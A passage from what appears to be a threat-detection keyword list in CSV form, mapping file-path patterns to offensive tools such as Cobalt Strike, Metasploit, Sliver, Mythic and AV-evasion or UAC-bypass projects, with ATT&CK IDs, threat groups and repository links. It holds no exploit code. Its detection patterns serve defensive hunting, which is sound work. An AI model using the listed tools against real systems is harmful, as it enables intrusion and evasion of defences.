T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RCStep/CSSG,1,1,N/A,10,10,554,107,2023-09-07T19:41:31Z,2021-01-12T14:39:06Z -*/build/formatted_shellcode*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RCStep/CSSG,1,1,N/A,10,10,554,107,2023-09-07T19:41:31Z,2021-01-12T14:39:06Z -*/build/shellcode*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RCStep/CSSG,1,1,N/A,10,10,554,107,2023-09-07T19:41:31Z,2021-01-12T14:39:06Z -*/BuildBOFs/*,offensive_tool_keyword,cobaltstrike,C# .Net 5.0 project to build BOF (Beacon Object Files) in mass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/ceramicskate0/BOF-Builder,1,1,N/A,10,10,23,3,2023-07-25T22:19:27Z,2021-09-07T01:28:11Z -*/burp/releases/community/latest*,offensive_tool_keyword,burpsuite,The class-leading vulnerability scanning. penetration testing. and web app security platform,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation Tools,https://portswigger.net/burp,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/burp-api/*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -*/burp-Dirbuster*,offensive_tool_keyword,dirbuster,Dirbuster plugin for Burp Suite,T1583 - T1595 - T1190,TA0011 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/vulnersCom/burp-Dirbuster,1,1,N/A,N/A,1,71,28,2017-02-22T08:31:32Z,2017-02-22T08:24:05Z -*/burpee.py*,offensive_tool_keyword,cobaltstrike,Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CodeXTF2/Burp2Malleable,1,1,N/A,10,10,320,32,2023-04-06T15:24:12Z,2022-08-14T18:05:39Z -*/BurpExtender.java*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0010 - TA0007 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -*/burp-proxy*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/BurpSuite-collections*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*/BUYTHEAPTDETECTORNOW*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/byakugan.cpp*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/byakugan.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/bypass.vbs*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/Bypass/payloads*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*/bypass_mod/loader*,offensive_tool_keyword,C2 related tools,An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Ed1s0nZ/cool,1,1,N/A,10,10,668,113,2023-07-13T07:04:30Z,2021-11-10T14:32:34Z -*/BypassAV/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike plugin for 
quickly generating anti-kill executable files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/hack2fun/BypassAV,1,1,N/A,10,10,830,126,2020-07-19T15:46:54Z,2020-02-17T02:33:14Z -*/bypassAV-1/*,offensive_tool_keyword,cobaltstrike,bypassAV cobaltstrike shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/jas502n/bypassAV-1,1,1,N/A,10,10,18,9,2021-03-04T01:51:14Z,2021-03-03T11:33:38Z -*/BypassCredGuard.git*,offensive_tool_keyword,BypassCredGuard,Credential Guard Bypass Via Patching Wdigest Memory,T1558 - T1558.001 - T1055 - T1055.002,TA0006 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/BypassCredGuard,1,1,N/A,10,3,277,50,2023-02-03T06:55:43Z,2023-01-18T15:16:11Z -*/BypassFramework.py*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,1,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*/bypassuac/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/C2/Beacon/*.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*/c2/c2.go*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/C2/c2.go*,offensive_tool_keyword,GC2-sheet,GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.,T1071.002 - T1560 - T1105,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/looCiprian/GC2-sheet,1,1,N/A,10,10,449,89,2023-07-06T19:22:36Z,2021-09-15T19:06:12Z -*/C2/Http/*.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z 
-*/C2/server.py*,offensive_tool_keyword,primusC2,another C2 framework,T1090 - T1071,TA0011 - TA0002,N/A,N/A,C2,https://github.com/Primusinterp/PrimusC2,1,1,N/A,10,10,42,4,2023-08-21T04:05:48Z,2023-04-19T10:59:30Z -*/C2/SmbListener.*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*/c2/tcp-stager.*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/c2_code/*.html,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/c2_code/server*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/C2_Profiles/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/C2_Server.git*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,1,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*/c2_server/resources*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*/c2_test.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/C2concealer*,offensive_tool_keyword,C2concealer,C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RedSiege/C2concealer,1,1,N/A,10,10,850,162,2021-09-26T16:37:06Z,2020-03-23T14:13:16Z -*/C2concealer*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/C2Frame.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/C2Manager.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*/c2profile.*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*/c2profile.go*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,1,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z 
